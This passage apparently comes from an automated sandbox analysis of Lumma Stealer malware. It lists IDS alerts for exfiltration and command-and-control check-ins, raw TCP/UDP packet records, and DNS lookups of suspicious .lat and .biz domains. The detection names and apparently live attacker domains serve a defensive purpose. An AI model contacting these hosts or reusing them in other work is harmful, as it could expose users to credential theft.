                                                                                                                                                                                                            2025-01-10T11:34:31.736399+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549796104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:33.191826+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549805104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:34.476499+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.561984104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:35.105358+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.561984104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:37.015416+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.562001104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:39.107891+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.562017104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:40.315230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.562024104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:40.780403+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.562024104.21.48.1443TCP

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.734096050 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.734148026 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.734226942 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.735517979 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.735539913 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.390510082 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.390610933 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.395000935 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.395030975 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.395339012 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.449297905 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.450756073 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.491326094 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908375978 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908401966 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908409119 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908442020 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908443928 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908461094 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908504963 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908540964 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908540964 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908540964 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.908581018 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.983859062 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.983925104 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.983959913 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.983989954 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.984020948 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.984044075 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.986268044 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.986335039 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.986367941 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.986530066 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.986587048 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.987337112 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.987337112 CET49770443192.168.2.5104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.987371922 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:28.987396955 CET44349770104.102.49.254192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.020744085 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.020756960 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.020827055 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.021100998 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.021112919 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.481199980 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.481328964 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.482923031 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.482938051 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.483196020 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.486136913 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.486155033 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.486361027 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.914911985 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.915000916 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.915062904 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.915772915 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.915801048 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.915813923 CET49780443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.915821075 CET44349780104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.009974003 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.010071039 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.010154009 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.010540009 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.010584116 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.467406034 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.467470884 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.468679905 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.468688011 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.469008923 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.470288038 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.470331907 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.470377922 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952373028 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952436924 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952477932 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952517986 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952517033 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952538013 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952552080 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.952955961 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953001022 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953006983 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953269005 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953309059 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953314066 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953660965 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953706980 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.953713894 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.957160950 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.957201958 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.957210064 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.011881113 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039042950 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039167881 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039257050 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039503098 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039503098 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039520025 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039530039 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268440008 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268471956 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268645048 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268877983 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268893957 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.736331940 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.736398935 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.737647057 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.737654924 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.737900019 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.740864038 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.740995884 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.741024017 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270318985 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270461082 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270642042 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270873070 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270889997 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732028961 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732065916 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732144117 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732526064 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732539892 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.191675901 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.191826105 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.193406105 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.193435907 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.194076061 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195302010 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195415974 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195453882 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195516109 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195530891 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.601208925 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.606096983 CET5361982162.159.36.2192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.610688925 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.615534067 CET5361982162.159.36.2192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741085052 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741200924 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741362095 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741421938 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741441011 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.006797075 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.006846905 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.006930113 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.007266998 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.007283926 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.079252005 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.084379911 CET5361982162.159.36.2192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.084445000 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.476430893 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.476499081 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.477688074 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.477695942 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.478041887 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479207039 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479367971 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479397058 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479458094 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479468107 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.105427980 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.105547905 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.105609894 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.245300055 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.245318890 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558376074 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558410883 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558501005 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558903933 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558919907 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.015221119 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.015415907 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.022039890 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.022059917 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.022336006 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.023618937 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.023746967 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.023751974 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517438889 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517534018 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517591953 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517688036 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517705917 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.652731895 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.652765036 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.652843952 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.653167963 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.653184891 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.107798100 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.107891083 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.109462023 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.109472036 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.109739065 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.113020897 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.113141060 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.113154888 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.685358047 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.685436964 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.685508966 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.685676098 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.685688972 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.837852001 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.837862968 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.837964058 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.838355064 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.838366032 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.315154076 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.315229893 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.316433907 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.316443920 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.316685915 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.318182945 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.318219900 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.318276882 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.780596018 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.780854940 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.780925035 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.781073093 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.781086922 CET44362024104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.781097889 CET62024443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:40.781101942 CET44362024104.21.48.1192.168.2.5

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.592979908 CET4991953192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.602564096 CET53499191.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.613414049 CET5102353192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.622258902 CET53510231.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.623847008 CET6397653192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.633722067 CET53639761.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.636199951 CET6528353192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.645395041 CET53652831.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.646656036 CET5799153192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.655909061 CET53579911.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.658560991 CET5703553192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.670572042 CET53570351.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.673815012 CET5848353192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.683118105 CET53584831.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.684905052 CET5026753192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.693346024 CET53502671.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.695225000 CET5514953192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.705284119 CET53551491.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.707674026 CET5711253192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.714346886 CET53571121.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.009962082 CET5585253192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET53558521.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.597028017 CET5359261162.159.36.2192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.088170052 CET6506853192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.095875025 CET53650681.1.1.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:46.350358963 CET6218253192.168.2.51.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:46.359170914 CET53621821.1.1.1192.168.2.5

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.592979908 CET192.168.2.51.1.1.10xda3aStandard query (0)enterwahsh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.613414049 CET192.168.2.51.1.1.10xfee1Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.623847008 CET192.168.2.51.1.1.10x102fStandard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.636199951 CET192.168.2.51.1.1.10xe069Standard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.646656036 CET192.168.2.51.1.1.10x51cdStandard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.658560991 CET192.168.2.51.1.1.10xde78Standard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.673815012 CET192.168.2.51.1.1.10x82f2Standard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.684905052 CET192.168.2.51.1.1.10xf2b6Standard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.695225000 CET192.168.2.51.1.1.10x260Standard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.707674026 CET192.168.2.51.1.1.10x5b7dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.009962082 CET192.168.2.51.1.1.10xba25Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.088170052 CET192.168.2.51.1.1.10xb433Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
